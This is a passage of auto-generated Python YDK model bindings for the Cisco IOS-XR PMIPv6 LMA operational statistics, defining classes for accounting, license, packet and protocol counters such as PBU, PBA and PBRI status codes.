super(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.AccountingStatistics, self).__init__()
self.yang_name = "accounting-statistics"
self.yang_parent_name = "customer-statistic"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('accounting_start_sent_count', (YLeaf(YType.uint64, 'accounting-start-sent-count'), ['int'])),
('accounting_update_sent_count', (YLeaf(YType.uint64, 'accounting-update-sent-count'), ['int'])),
('accounting_stop_sent_count', (YLeaf(YType.uint64, 'accounting-stop-sent-count'), ['int'])),
])
self.accounting_start_sent_count = None
self.accounting_update_sent_count = None
self.accounting_stop_sent_count = None
self._segment_path = lambda: "accounting-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.AccountingStatistics, ['accounting_start_sent_count', 'accounting_update_sent_count', 'accounting_stop_sent_count'], name, value)
class License(Entity):
"""
LMA License Statistics
.. attribute:: lma_identifier
LMA Identifier
**type**\: str
.. attribute:: bce_count
Instantaneous Count of Bindings
**type**\: int
**range:** 0..4294967295
.. attribute:: peak_bce_count
Peak Count of Bindings
**type**\: int
**range:** 0..4294967295
.. attribute:: peak_bce_count_reset_timestamp
Timestamp when the Peak Count of Bindings was reset
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.License, self).__init__()
self.yang_name = "license"
self.yang_parent_name = "statistics"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('lma_identifier', (YLeaf(YType.str, 'lma-identifier'), ['str'])),
('bce_count', (YLeaf(YType.uint32, 'bce-count'), ['int'])),
('peak_bce_count', (YLeaf(YType.uint32, 'peak-bce-count'), ['int'])),
('peak_bce_count_reset_timestamp', (YLeaf(YType.uint32, 'peak-bce-count-reset-timestamp'), ['int'])),
])
self.lma_identifier = None
self.bce_count = None
self.peak_bce_count = None
self.peak_bce_count_reset_timestamp = None
self._segment_path = lambda: "license"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.License, ['lma_identifier', 'bce_count', 'peak_bce_count', 'peak_bce_count_reset_timestamp'], name, value)
class Global(Entity):
"""
Global Statistics
.. attribute:: packet_statistics
Packet Statistics
**type**\: :py:class:`PacketStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.Global.PacketStatistics>`
.. attribute:: protocol_statistics
LMA Protocol Statistics
**type**\: :py:class:`ProtocolStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.Global.ProtocolStatistics>`
.. attribute:: accounting_statistics
LMA Accounting Statistics
**type**\: :py:class:`AccountingStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.Global.AccountingStatistics>`
.. attribute:: lma_identifier
LMA Identifier
**type**\: str
.. attribute:: bce_count
Count of Bindings
**type**\: int
**range:** 0..4294967295
.. attribute:: handoff_count
Count of Handoffs
**type**\: int
**range:** 0..4294967295
.. attribute:: single_tenant_count
Count of Single Tenants
**type**\: int
**range:** 0..4294967295
.. attribute:: multi_tenant_count
Count of Multi Tenants
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.Global, self).__init__()
self.yang_name = "global"
self.yang_parent_name = "statistics"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("packet-statistics", ("packet_statistics", Pmipv6.Lma.Statistics.Global.PacketStatistics)), ("protocol-statistics", ("protocol_statistics", Pmipv6.Lma.Statistics.Global.ProtocolStatistics)), ("accounting-statistics", ("accounting_statistics", Pmipv6.Lma.Statistics.Global.AccountingStatistics))])
self._leafs = OrderedDict([
('lma_identifier', (YLeaf(YType.str, 'lma-identifier'), ['str'])),
('bce_count', (YLeaf(YType.uint32, 'bce-count'), ['int'])),
('handoff_count', (YLeaf(YType.uint32, 'handoff-count'), ['int'])),
('single_tenant_count', (YLeaf(YType.uint32, 'single-tenant-count'), ['int'])),
('multi_tenant_count', (YLeaf(YType.uint32, 'multi-tenant-count'), ['int'])),
])
self.lma_identifier = None
self.bce_count = None
self.handoff_count = None
self.single_tenant_count = None
self.multi_tenant_count = None
self.packet_statistics = Pmipv6.Lma.Statistics.Global.PacketStatistics()
self.packet_statistics.parent = self
self._children_name_map["packet_statistics"] = "packet-statistics"
self.protocol_statistics = Pmipv6.Lma.Statistics.Global.ProtocolStatistics()
self.protocol_statistics.parent = self
self._children_name_map["protocol_statistics"] = "protocol-statistics"
self.accounting_statistics = Pmipv6.Lma.Statistics.Global.AccountingStatistics()
self.accounting_statistics.parent = self
self._children_name_map["accounting_statistics"] = "accounting-statistics"
self._segment_path = lambda: "global"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.Global, ['lma_identifier', 'bce_count', 'handoff_count', 'single_tenant_count', 'multi_tenant_count'], name, value)
class PacketStatistics(Entity):
"""
Packet Statistics
.. attribute:: checksum_errors
Checksumm errors
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: send_drops
Drop count of sent packets
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: receive_drops
Drop count of received packets
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: packets_received
Count of received packets
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: packets_sent
Count of sent packets
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: send_drops_ipv6
Drop count of IPv6 sent packets
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: receive_drops_ipv6
Drop count of IPv6 received packets
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: packets_received_ipv6
Count of IPv6 received packets
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: packets_sent_ipv6
Count of IPv6 sent packets
**type**\: int
**range:** 0..18446744073709551615
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.Global.PacketStatistics, self).__init__()
self.yang_name = "packet-statistics"
self.yang_parent_name = "global"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('checksum_errors', (YLeaf(YType.uint64, 'checksum-errors'), ['int'])),
('send_drops', (YLeaf(YType.uint64, 'send-drops'), ['int'])),
('receive_drops', (YLeaf(YType.uint64, 'receive-drops'), ['int'])),
('packets_received', (YLeaf(YType.uint64, 'packets-received'), ['int'])),
('packets_sent', (YLeaf(YType.uint64, 'packets-sent'), ['int'])),
('send_drops_ipv6', (YLeaf(YType.uint64, 'send-drops-ipv6'), ['int'])),
('receive_drops_ipv6', (YLeaf(YType.uint64, 'receive-drops-ipv6'), ['int'])),
('packets_received_ipv6', (YLeaf(YType.uint64, 'packets-received-ipv6'), ['int'])),
('packets_sent_ipv6', (YLeaf(YType.uint64, 'packets-sent-ipv6'), ['int'])),
])
self.checksum_errors = None
self.send_drops = None
self.receive_drops = None
self.packets_received = None
self.packets_sent = None
self.send_drops_ipv6 = None
self.receive_drops_ipv6 = None
self.packets_received_ipv6 = None
self.packets_sent_ipv6 = None
self._segment_path = lambda: "packet-statistics"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/global/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.Global.PacketStatistics, ['checksum_errors', 'send_drops', 'receive_drops', 'packets_received', 'packets_sent', 'send_drops_ipv6', 'receive_drops_ipv6', 'packets_received_ipv6', 'packets_sent_ipv6'], name, value)
class ProtocolStatistics(Entity):
"""
LMA Protocol Statistics
.. attribute:: pbu_receive_statistics
PBU Receive Statistics
**type**\: :py:class:`PbuReceiveStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbuReceiveStatistics>`
.. attribute:: pba_send_statistics
PBA Send Statistics
**type**\: :py:class:`PbaSendStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbaSendStatistics>`
.. attribute:: pbri_send_statistics
PBRI Send Statistics
**type**\: :py:class:`PbriSendStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbriSendStatistics>`
.. attribute:: pbri_receive_statistics
PBRI Receive Statistics
**type**\: :py:class:`PbriReceiveStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbriReceiveStatistics>`
.. attribute:: pbra_send_statistics
PBRA Send Statistics
**type**\: :py:class:`PbraSendStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbraSendStatistics>`
.. attribute:: pbra_receive_statistics
PBRA Receive Statistics
**type**\: :py:class:`PbraReceiveStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbraReceiveStatistics>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.Global.ProtocolStatistics, self).__init__()
self.yang_name = "protocol-statistics"
self.yang_parent_name = "global"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("pbu-receive-statistics", ("pbu_receive_statistics", Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbuReceiveStatistics)), ("pba-send-statistics", ("pba_send_statistics", Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbaSendStatistics)), ("pbri-send-statistics", ("pbri_send_statistics", Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbriSendStatistics)), ("pbri-receive-statistics", ("pbri_receive_statistics", Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbriReceiveStatistics)), ("pbra-send-statistics", ("pbra_send_statistics", Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbraSendStatistics)), ("pbra-receive-statistics", ("pbra_receive_statistics", Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbraReceiveStatistics))])
self._leafs = OrderedDict()
self.pbu_receive_statistics = Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbuReceiveStatistics()
self.pbu_receive_statistics.parent = self
self._children_name_map["pbu_receive_statistics"] = "pbu-receive-statistics"
self.pba_send_statistics = Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbaSendStatistics()
self.pba_send_statistics.parent = self
self._children_name_map["pba_send_statistics"] = "pba-send-statistics"
self.pbri_send_statistics = Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbriSendStatistics()
self.pbri_send_statistics.parent = self
self._children_name_map["pbri_send_statistics"] = "pbri-send-statistics"
self.pbri_receive_statistics = Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbriReceiveStatistics()
self.pbri_receive_statistics.parent = self
self._children_name_map["pbri_receive_statistics"] = "pbri-receive-statistics"
self.pbra_send_statistics = Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbraSendStatistics()
self.pbra_send_statistics.parent = self
self._children_name_map["pbra_send_statistics"] = "pbra-send-statistics"
self.pbra_receive_statistics = Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbraReceiveStatistics()
self.pbra_receive_statistics.parent = self
self._children_name_map["pbra_receive_statistics"] = "pbra-receive-statistics"
self._segment_path = lambda: "protocol-statistics"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/global/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.Global.ProtocolStatistics, [], name, value)
class PbuReceiveStatistics(Entity):
"""
PBU Receive Statistics
.. attribute:: pbu_count
Count of PBUs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbu_drop_count
Count of PBUs Dropped
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbuReceiveStatistics, self).__init__()
self.yang_name = "pbu-receive-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbu_count', (YLeaf(YType.uint64, 'pbu-count'), ['int'])),
('pbu_drop_count', (YLeaf(YType.uint32, 'pbu-drop-count'), ['int'])),
])
self.pbu_count = None
self.pbu_drop_count = None
self._segment_path = lambda: "pbu-receive-statistics"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/global/protocol-statistics/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbuReceiveStatistics, ['pbu_count', 'pbu_drop_count'], name, value)
class PbaSendStatistics(Entity):
"""
PBA Send Statistics
.. attribute:: pba_count
Count of PBAs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pba_drop_count
Count of PBAs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: accepted_count
Count of Status Code \- Binding Update accepted
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_count
Count of Status Code \- Last BA status code sent
**type**\: int
**range:** 0..4294967295
.. attribute:: unspecified_failure_count
Count of Status Code \- Reason unspecified
**type**\: int
**range:** 0..4294967295
.. attribute:: admin_failure_count
Count of Status Code \- Administratively prohibited
**type**\: int
**range:** 0..4294967295
.. attribute:: resource_failure_count
Count of Status Code \- Insufficient resources
**type**\: int
**range:** 0..4294967295
.. attribute:: home_reg_failure_count
Count of Status Code \- Home registration not supported
**type**\: int
**range:** 0..4294967295
.. attribute:: home_subnet_failure_count
Count of Status Code \- Not home subnet
**type**\: int
**range:** 0..4294967295
.. attribute:: bad_sequence_failure_count
Count of Status Code \- Sequence number out of window
**type**\: int
**range:** 0..4294967295
.. attribute:: reg_type_failure_count
Count of Status Code \- Registration type change
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_failure_count
Count of Status Code \- Auth Fail
**type**\: int
**range:** 0..4294967295
.. attribute:: proxy_reg_not_enabled_count
Count of Status Code \- Proxy Registration not enabled
**type**\: int
**range:** 0..4294967295
.. attribute:: not_lma_for_this_mn_count
Count of Status Code \- Not LMA for this Mobile Node
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_proxy_reg_count
Count of Status Code \- MAG not auth.for proxyreg
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_hnp_count
Count of Status Code \- Not authorized for HNP
**type**\: int
**range:** 0..4294967295
.. attribute:: timestamp_mismatch_count
Count of Status Code \- Invalid timestamp value
**type**\: int
**range:** 0..4294967295
.. attribute:: timestamp_lower_than_previous_accepted_count
Count of Status Code \- Timestamp lower than previous accepted
**type**\: int
**range:** 0..4294967295
.. attribute:: missing_hnp_opt_count
Count of Status Code \- Missing Home Network Prefix option
**type**\: int
**range:** 0..4294967295
.. attribute:: received_hnps_do_not_match_bce_hnps_count
Count of Status Code \- Recevied HNPs do not match with BCE
**type**\: int
**range:** 0..4294967295
.. attribute:: missing_mn_id_opt_count
Count of Status Code \- Missing MN identifier option
**type**\: int
**range:** 0..4294967295
.. attribute:: missing_hi_opt_count
Count of Status Code \- Missing Handoff Indicator
**type**\: int
**range:** 0..4294967295
.. attribute:: missing_access_tech_type_opt_count
Count of Status Code \- Missing ATT option
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_ipv4_mobility_count
Count of Status Code \- Not authorized for IPv4 mobility
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_ipv4_hoa_count
Count of Status Code \- Not authorized for IPv4 HoA
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_ipv6_mobility_count
Count of Status Code \- Not authorized for IPv6 mobility
**type**\: int
**range:** 0..4294967295
.. attribute:: multiple_ipv4_ho_a_not_supported_count
Count of Status Code \- Multiple IPv4 HoA not supported
**type**\: int
**range:** 0..4294967295
.. attribute:: gre_key_opt_required_count
Count of Status Code \- GRE Key option is required
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbaSendStatistics, self).__init__()
self.yang_name = "pba-send-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pba_count', (YLeaf(YType.uint64, 'pba-count'), ['int'])),
('pba_drop_count', (YLeaf(YType.uint32, 'pba-drop-count'), ['int'])),
('accepted_count', (YLeaf(YType.uint32, 'accepted-count'), ['int'])),
('unknown_count', (YLeaf(YType.uint32, 'unknown-count'), ['int'])),
('unspecified_failure_count', (YLeaf(YType.uint32, 'unspecified-failure-count'), ['int'])),
('admin_failure_count', (YLeaf(YType.uint32, 'admin-failure-count'), ['int'])),
('resource_failure_count', (YLeaf(YType.uint32, 'resource-failure-count'), ['int'])),
('home_reg_failure_count', (YLeaf(YType.uint32, 'home-reg-failure-count'), ['int'])),
('home_subnet_failure_count', (YLeaf(YType.uint32, 'home-subnet-failure-count'), ['int'])),
('bad_sequence_failure_count', (YLeaf(YType.uint32, 'bad-sequence-failure-count'), ['int'])),
('reg_type_failure_count', (YLeaf(YType.uint32, 'reg-type-failure-count'), ['int'])),
('authen_failure_count', (YLeaf(YType.uint32, 'authen-failure-count'), ['int'])),
('proxy_reg_not_enabled_count', (YLeaf(YType.uint32, 'proxy-reg-not-enabled-count'), ['int'])),
('not_lma_for_this_mn_count', (YLeaf(YType.uint32, 'not-lma-for-this-mn-count'), ['int'])),
('no_author_for_proxy_reg_count', (YLeaf(YType.uint32, 'no-author-for-proxy-reg-count'), ['int'])),
('no_author_for_hnp_count', (YLeaf(YType.uint32, 'no-author-for-hnp-count'), ['int'])),
('timestamp_mismatch_count', (YLeaf(YType.uint32, 'timestamp-mismatch-count'), ['int'])),
('timestamp_lower_than_previous_accepted_count', (YLeaf(YType.uint32, 'timestamp-lower-than-previous-accepted-count'), ['int'])),
('missing_hnp_opt_count', (YLeaf(YType.uint32, 'missing-hnp-opt-count'), ['int'])),
('received_hnps_do_not_match_bce_hnps_count', (YLeaf(YType.uint32, 'received-hnps-do-not-match-bce-hnps-count'), ['int'])),
('missing_mn_id_opt_count', (YLeaf(YType.uint32, 'missing-mn-id-opt-count'), ['int'])),
('missing_hi_opt_count', (YLeaf(YType.uint32, 'missing-hi-opt-count'), ['int'])),
('missing_access_tech_type_opt_count', (YLeaf(YType.uint32, 'missing-access-tech-type-opt-count'), ['int'])),
('no_author_for_ipv4_mobility_count', (YLeaf(YType.uint32, 'no-author-for-ipv4-mobility-count'), ['int'])),
('no_author_for_ipv4_hoa_count', (YLeaf(YType.uint32, 'no-author-for-ipv4-hoa-count'), ['int'])),
('no_author_for_ipv6_mobility_count', (YLeaf(YType.uint32, 'no-author-for-ipv6-mobility-count'), ['int'])),
('multiple_ipv4_ho_a_not_supported_count', (YLeaf(YType.uint32, 'multiple-ipv4-ho-a-not-supported-count'), ['int'])),
('gre_key_opt_required_count', (YLeaf(YType.uint32, 'gre-key-opt-required-count'), ['int'])),
])
self.pba_count = None
self.pba_drop_count = None
self.accepted_count = None
self.unknown_count = None
self.unspecified_failure_count = None
self.admin_failure_count = None
self.resource_failure_count = None
self.home_reg_failure_count = None
self.home_subnet_failure_count = None
self.bad_sequence_failure_count = None
self.reg_type_failure_count = None
self.authen_failure_count = None
self.proxy_reg_not_enabled_count = None
self.not_lma_for_this_mn_count = None
self.no_author_for_proxy_reg_count = None
self.no_author_for_hnp_count = None
self.timestamp_mismatch_count = None
self.timestamp_lower_than_previous_accepted_count = None
self.missing_hnp_opt_count = None
self.received_hnps_do_not_match_bce_hnps_count = None
self.missing_mn_id_opt_count = None
self.missing_hi_opt_count = None
self.missing_access_tech_type_opt_count = None
self.no_author_for_ipv4_mobility_count = None
self.no_author_for_ipv4_hoa_count = None
self.no_author_for_ipv6_mobility_count = None
self.multiple_ipv4_ho_a_not_supported_count = None
self.gre_key_opt_required_count = None
self._segment_path = lambda: "pba-send-statistics"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/global/protocol-statistics/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbaSendStatistics, ['pba_count', 'pba_drop_count', 'accepted_count', 'unknown_count', 'unspecified_failure_count', 'admin_failure_count', 'resource_failure_count', 'home_reg_failure_count', 'home_subnet_failure_count', 'bad_sequence_failure_count', 'reg_type_failure_count', 'authen_failure_count', 'proxy_reg_not_enabled_count', 'not_lma_for_this_mn_count', 'no_author_for_proxy_reg_count', 'no_author_for_hnp_count', 'timestamp_mismatch_count', 'timestamp_lower_than_previous_accepted_count', 'missing_hnp_opt_count', 'received_hnps_do_not_match_bce_hnps_count', 'missing_mn_id_opt_count', 'missing_hi_opt_count', 'missing_access_tech_type_opt_count', 'no_author_for_ipv4_mobility_count', 'no_author_for_ipv4_hoa_count', 'no_author_for_ipv6_mobility_count', 'multiple_ipv4_ho_a_not_supported_count', 'gre_key_opt_required_count'], name, value)
class PbriSendStatistics(Entity):
"""
PBRI Send Statistics
.. attribute:: pbri_count
Count of PBRIs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbri_drop_count
Count of PBRIs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: unspecified_count
Count of Revoc Trigger \- Unspecified
**type**\: int
**range:** 0..4294967295
.. attribute:: admin_reason_count
Count of Revoc Trigger \- Administrative Reason
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_same_att_count
Count of Revoc Trigger \- Inter MAG Handover Same ATT
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_different_att_count
Count of Revoc Trigger \- Inter MAG Handover Different ATT
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_unknown_count
Count of Revoc Trigger \- Inter MAG Handover Unknown
**type**\: int
**range:** 0..4294967295
.. attribute:: user_session_termination_count
Count of Revoc Trigger \- User Init Session Terminatation
**type**\: int
**range:** 0..4294967295
.. attribute:: network_session_termination_count
Count of Revoc Trigger \- Access Network Session Termination
**type**\: int
**range:** 0..4294967295
.. attribute:: out_of_sync_bce_state_count
Count of Revoc Trigger \- Possible Out\-of\-Sync BCE State
**type**\: int
**range:** 0..4294967295
.. attribute:: per_peer_policy_count
Count of Revoc Trigger \- Per\-Peer Policy
**type**\: int
**range:** 0..4294967295
.. attribute:: revoking_mn_local_policy_count
Count of Revoc Trigger \- Revoking Mobility Node Local Policy
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbriSendStatistics, self).__init__()
self.yang_name = "pbri-send-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbri_count', (YLeaf(YType.uint64, 'pbri-count'), ['int'])),
('pbri_drop_count', (YLeaf(YType.uint32, 'pbri-drop-count'), ['int'])),
('unspecified_count', (YLeaf(YType.uint32, 'unspecified-count'), ['int'])),
('admin_reason_count', (YLeaf(YType.uint32, 'admin-reason-count'), ['int'])),
('mag_handover_same_att_count', (YLeaf(YType.uint32, 'mag-handover-same-att-count'), ['int'])),
('mag_handover_different_att_count', (YLeaf(YType.uint32, 'mag-handover-different-att-count'), ['int'])),
('mag_handover_unknown_count', (YLeaf(YType.uint32, 'mag-handover-unknown-count'), ['int'])),
('user_session_termination_count', (YLeaf(YType.uint32, 'user-session-termination-count'), ['int'])),
('network_session_termination_count', (YLeaf(YType.uint32, 'network-session-termination-count'), ['int'])),
('out_of_sync_bce_state_count', (YLeaf(YType.uint32, 'out-of-sync-bce-state-count'), ['int'])),
('per_peer_policy_count', (YLeaf(YType.uint32, 'per-peer-policy-count'), ['int'])),
('revoking_mn_local_policy_count', (YLeaf(YType.uint32, 'revoking-mn-local-policy-count'), ['int'])),
])
self.pbri_count = None
self.pbri_drop_count = None
self.unspecified_count = None
self.admin_reason_count = None
self.mag_handover_same_att_count = None
self.mag_handover_different_att_count = None
self.mag_handover_unknown_count = None
self.user_session_termination_count = None
self.network_session_termination_count = None
self.out_of_sync_bce_state_count = None
self.per_peer_policy_count = None
self.revoking_mn_local_policy_count = None
self._segment_path = lambda: "pbri-send-statistics"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/global/protocol-statistics/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbriSendStatistics, ['pbri_count', 'pbri_drop_count', 'unspecified_count', 'admin_reason_count', 'mag_handover_same_att_count', 'mag_handover_different_att_count', 'mag_handover_unknown_count', 'user_session_termination_count', 'network_session_termination_count', 'out_of_sync_bce_state_count', 'per_peer_policy_count', 'revoking_mn_local_policy_count'], name, value)
class PbriReceiveStatistics(Entity):
"""
PBRI Receive Statistics
.. attribute:: pbri_count
Count of PBRIs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbri_drop_count
Count of PBRIs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: unspecified_count
Count of Revoc Trigger \- Unspecified
**type**\: int
**range:** 0..4294967295
.. attribute:: admin_reason_count
Count of Revoc Trigger \- Administrative Reason
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_same_att_count
Count of Revoc Trigger \- Inter MAG Handover Same ATT
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_different_att_count
Count of Revoc Trigger \- Inter MAG Handover Different ATT
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_unknown_count
Count of Revoc Trigger \- Inter MAG Handover Unknown
**type**\: int
**range:** 0..4294967295
.. attribute:: user_session_termination_count
Count of Revoc Trigger \- User Init Session Terminatation
**type**\: int
**range:** 0..4294967295
.. attribute:: network_session_termination_count
Count of Revoc Trigger \- Access Network Session Termination
**type**\: int
**range:** 0..4294967295
.. attribute:: out_of_sync_bce_state_count
Count of Revoc Trigger \- Possible Out\-of\-Sync BCE State
**type**\: int
**range:** 0..4294967295
.. attribute:: per_peer_policy_count
Count of Revoc Trigger \- Per\-Peer Policy
**type**\: int
**range:** 0..4294967295
.. attribute:: revoking_mn_local_policy_count
Count of Revoc Trigger \- Revoking Mobility Node Local Policy
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbriReceiveStatistics, self).__init__()
self.yang_name = "pbri-receive-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbri_count', (YLeaf(YType.uint64, 'pbri-count'), ['int'])),
('pbri_drop_count', (YLeaf(YType.uint32, 'pbri-drop-count'), ['int'])),
('unspecified_count', (YLeaf(YType.uint32, 'unspecified-count'), ['int'])),
('admin_reason_count', (YLeaf(YType.uint32, 'admin-reason-count'), ['int'])),
('mag_handover_same_att_count', (YLeaf(YType.uint32, 'mag-handover-same-att-count'), ['int'])),
('mag_handover_different_att_count', (YLeaf(YType.uint32, 'mag-handover-different-att-count'), ['int'])),
('mag_handover_unknown_count', (YLeaf(YType.uint32, 'mag-handover-unknown-count'), ['int'])),
('user_session_termination_count', (YLeaf(YType.uint32, 'user-session-termination-count'), ['int'])),
('network_session_termination_count', (YLeaf(YType.uint32, 'network-session-termination-count'), ['int'])),
('out_of_sync_bce_state_count', (YLeaf(YType.uint32, 'out-of-sync-bce-state-count'), ['int'])),
('per_peer_policy_count', (YLeaf(YType.uint32, 'per-peer-policy-count'), ['int'])),
('revoking_mn_local_policy_count', (YLeaf(YType.uint32, 'revoking-mn-local-policy-count'), ['int'])),
])
self.pbri_count = None
self.pbri_drop_count = None
self.unspecified_count = None
self.admin_reason_count = None
self.mag_handover_same_att_count = None
self.mag_handover_different_att_count = None
self.mag_handover_unknown_count = None
self.user_session_termination_count = None
self.network_session_termination_count = None
self.out_of_sync_bce_state_count = None
self.per_peer_policy_count = None
self.revoking_mn_local_policy_count = None
self._segment_path = lambda: "pbri-receive-statistics"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/global/protocol-statistics/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
